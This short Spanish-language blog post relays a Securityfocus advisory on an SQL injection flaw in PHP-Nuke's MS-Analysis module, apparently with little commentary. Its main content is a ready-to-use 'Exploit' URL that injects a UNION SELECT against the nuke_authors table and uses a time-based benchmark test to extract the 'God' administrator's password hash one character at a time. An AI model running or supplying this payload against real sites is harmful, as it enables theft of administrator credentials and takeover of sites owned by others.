Blogia
xatyro

PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection Vulnerability

PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection Vulnerability Nuevo vulnerabilidades publicada en Secuityfocus sobre Phpnuke que permite injection sql.

Exploit:

"http://www.example.com/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1)/*"

Para mas Info: Securityfocus

0 comentarios